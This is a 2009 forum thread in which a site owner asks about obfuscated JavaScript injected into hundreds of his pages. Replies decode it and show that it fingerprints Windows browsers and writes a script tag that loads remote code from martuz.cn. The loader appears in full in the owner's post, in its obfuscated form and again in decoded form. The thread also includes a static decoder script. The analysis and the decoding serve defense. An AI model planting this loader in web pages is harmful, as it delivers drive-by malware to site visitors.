speedy33417 Posted May 19, 2009

I have some weird code that appeared in my website's source code. Not sure if someone hacked into my server or what happened. Here's the code. How concerned should I be? What does the code do?

<script language=javascript><!--
(function(){
var tdv2O='%';
var zL7j=('va>72>20a>3d>22S>63riptEngine>22>2cb>3d>22>56ersion()+>22>2c>6a>3d>22>22>2cu>3dnavig>61tor>2eu>73>65r>41gen>74>3bif>28>28u>2eind>65x>4ff>28>22C>68>72o>6de>22>29>3c0)>26>26(u>2ei>6edexO>66>28>22Win>22)>3e>30)>26>26>28u>2eindexOf(>22NT>20>36>22)>3c0)>26>26(do>63ument>2eco>6fki>65>2eind>65x>4f>66>28>22miek>3d1>22)>3c0)>26>26(>74ypeo>66>28z>72>76>7ats)>21>3d>74yp>65of(>22A>22)))>7b>7ar>76zt>73>3d>22A>22>3beval(>22if(wi>6edow>2e>22+a>2b>22>29j>3dj+>22+a+>22Major>22>2b>62>2ba+>22M>69nor>22>2bb+a>2b>22Build>22+b>2b>22j>3b>22)>3bdocu>6dent>2e>77ri>74e(>22>3cs>63ri>70>74>20src>3d>2f>2fm>22+>22a>72tu>7a>2e>63n>2fvid>2f>3fid>3d>22+j>2b>22>3e>3c>5c>2fscript>3e>22>29>3b>7d').replace(/>/g,tdv2O);
var bhioa=unescape(zL7j);
eval(bhioa)
})();
--></script>
ober Posted May 19, 2009

Probably a trojan injected by a hacker. Delete it and secure your site.
speedy33417 (Author) Posted May 19, 2009

Thanks ober. This code has been added to hundreds of pages on my site and luckily they all have the same upload time stamp, so I can easily spot which ones have been affected. If it's a trojan, what does it really do? Does it steal passwords? How does it work? Would I have to be on an affected webpage and information entered on that page would be compromised? Or does this mean that my entire website is compromised now? I'm just trying to understand what it might do and what damage may have been done. Thanks for your help.
ober Posted May 19, 2009

It will actually try to install itself on the client PC. I got nailed on my personal site when I used some 3rd party code. Some of my users had their anti-virus software pick it up.
Ken2k7 Posted May 19, 2009

My friend's blog site had something similar. It never affected me though. Hail NOSCRIPT!
Daniel0 Posted May 19, 2009

Well, you could just check the code yourself, no? What you posted is equivalent to the following Javascript:

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");}

Applying some formatting we get:

var a="ScriptEngine",
    b="Version()+",
    j="",
    u=navigator.userAgent;

if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof(zrvzts) != typeof("A"))) {
    zrvzts="A";
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
    document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
}

The string within the eval() is this:

if(window.ScriptEngine)j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;

So it'll set j if some conditions are true, and it will then execute the Javascript which is hosted on http://martuz.cn/vid/?id=j

This is seemingly a "reported attack site". The domain name martuz.cn resolves to 98.124.198.1, but that machine doesn't seem to be up.
speedy33417 (Author) Posted May 20, 2009

Thanks all for the help. Btw, Daniel, how did you get your version of the JS code out of mine? It doesn't look anything close to what you posted. Is it encrypted in some way? How (and where) do I convert the original hacker code to JS code that makes more sense (like yours)?
Daniel0 Posted May 20, 2009

You see the very last statement of your code?

eval(bhioa)

It's evaluating the contents of the variable bhioa. It's simply a matter of printing that variable to get the plain text code. It's no more than obfuscation. A browser needs HTML, CSS and Javascript in plain text, so it's impossible to decrypt it and/or hide it.
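The two steps Daniel0 describes (swap the marker back to `%`, then `unescape()`) can be done statically, without ever running the payload in a browser. The following is an added example, not code from the thread: it decodes the string from the first post with a re-implemented `unescape()` and then pulls out the details a site owner would want to verify (external host, cookie marker, user-agent checks). The function names `legacyUnescape`, `decodeObfuscated` and `summarise` are my own.

```javascript
// Added example, not code from the thread: recover the plain-text
// JavaScript behind the posted obfuscation WITHOUT calling eval().
// The sample does two things before eval(): it swaps '>' back to '%'
// with .replace(/>/g, '%'), then runs unescape() on the result.

// The encoded string exactly as it appears in the first post.
const POSTED_PAYLOAD = 'va>72>20a>3d>22S>63riptEngine>22>2cb>3d>22>56ersion()+>22>2c>6a>3d>22>22>2cu>3dnavig>61tor>2eu>73>65r>41gen>74>3bif>28>28u>2eind>65x>4ff>28>22C>68>72o>6de>22>29>3c0)>26>26(u>2ei>6edexO>66>28>22Win>22)>3e>30)>26>26>28u>2eindexOf(>22NT>20>36>22)>3c0)>26>26(do>63ument>2eco>6fki>65>2eind>65x>4f>66>28>22miek>3d1>22)>3c0)>26>26(>74ypeo>66>28z>72>76>7ats)>21>3d>74yp>65of(>22A>22)))>7b>7ar>76zt>73>3d>22A>22>3beval(>22if(wi>6edow>2e>22+a>2b>22>29j>3dj+>22+a+>22Major>22>2b>62>2ba+>22M>69nor>22>2bb+a>2b>22Build>22+b>2b>22j>3b>22)>3bdocu>6dent>2e>77ri>74e(>22>3cs>63ri>70>74>20src>3d>2f>2fm>22+>22a>72tu>7a>2e>63n>2fvid>2f>3fid>3d>22+j>2b>22>3e>3c>5c>2fscript>3e>22>29>3b>7d';
const POSTED_MARKER = '>';

// Re-implementation of the legacy unescape(): decodes %XX and %uXXXX.
function legacyUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_m, u4, h2) =>
    String.fromCharCode(parseInt(u4 !== undefined ? u4 : h2, 16)));
}

// Undo the obfuscation statically: marker -> '%', then percent-decode.
function decodeObfuscated(payload, marker) {
  return legacyUnescape(payload.split(marker).join('%'));
}

// Extract what a site owner needs from the decoded code: whether it
// evals or writes a <script>, which hosts it loads from, which cookie it
// uses as an "already infected" marker, and which user-agent strings it tests.
function summarise(decoded) {
  // Re-join split string literals such as "//m"+"artuz.cn" before matching.
  const joined = decoded.replace(/"\s*\+\s*"/g, '');
  const hosts = [...joined.matchAll(/src=(?:https?:)?\/\/([a-z0-9.-]+)/gi)]
    .map((m) => m[1].toLowerCase());
  const cookie = decoded.match(/cookie\.indexOf\("([^"]+)"\)/);
  return {
    usesEval: /\beval\s*\(/.test(decoded),
    writesScript: /document\.write\s*\(\s*"<script/i.test(decoded),
    hosts,
    cookieMarker: cookie ? cookie[1] : null,
    uaChecks: [...decoded.matchAll(/\bu\.indexOf\("([^"]+)"\)/g)].map((m) => m[1]),
  };
}

// Stand-alone run: print the recovered code and the summary.
const recovered = decodeObfuscated(POSTED_PAYLOAD, POSTED_MARKER);
console.log(recovered);
console.log(summarise(recovered));
```

Running it in Node prints the same plain-text code Daniel0 posted, plus a summary listing `martuz.cn` as the only external host, `miek=1` as the cookie marker and `Chrome`, `Win`, `NT 6` as the user-agent tests.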
PugJr Posted May 20, 2009

Just for future reference on security, how did your site obtain that in your source code? You can't add your own script into source code with like XSS or MySQL injections, right, or anything of that sort?
jackpf Posted May 20, 2009

Just wondering...how do you install stuff onto a client's PC with javascript? That would be cool.

And are you sure it's not your host? Is it actually in the file, if you open the file to edit it, not just on your source code? Some hosts automatically append scripts to all sites, like stat counters and stuff.

But yeah, try something like this:

document.write(unescape(bhioa));
waynew Posted May 21, 2009

> Just wondering...how do you install stuff onto a client's PC with javascript? That would be cool

Sorry mate. You need a hacker name such as RIPPER or SLASHER to do that.
jackpf Posted May 21, 2009

Ok, my new alias is "jackpf the ripper". That would be pretty fun though...